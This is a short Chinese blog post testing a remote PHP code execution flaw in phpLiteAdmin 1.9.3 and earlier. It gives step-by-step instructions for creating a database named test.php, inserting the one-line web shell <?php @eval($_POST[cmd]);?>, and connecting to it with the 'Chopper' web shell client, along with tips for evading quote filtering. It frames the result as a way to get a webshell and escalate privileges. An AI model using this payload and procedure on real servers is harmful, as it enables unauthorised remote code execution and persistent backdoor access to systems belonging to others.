phpliteadmin <= 1.9.3 远程php代码执行漏洞测试

漏洞来自:http://www.exploit-db.com/exploits/24044/本文仅仅是简单测试了一下,没有啥技术含量……
感觉这个还是用于提权获取
webshell,因为需要登录phpLiteAdmin,还需要有创建数据库权限。
首先,登录:SqliteAdmin创建数据库test.php:


若在sqliteadmin没有test.php,则此时会在当前目录下生成test.php,如下图: 


可以在test.php为扩展名的数据库中新建表a,并插入一句话代码<?php @eval($_POST[cmd]);?>


菜刀连接test.php:


测试完毕。注意:
1、上传的一句话中引号被过滤,一句话不要含单引号;
2、如果不能直接命名php扩展名的数据库,先新建一个sqlite数据库,后重命名为php。

(我最先最早将其发于linux520)

你可能感兴趣的:(PHP,webshell,提权,phpliteadmin)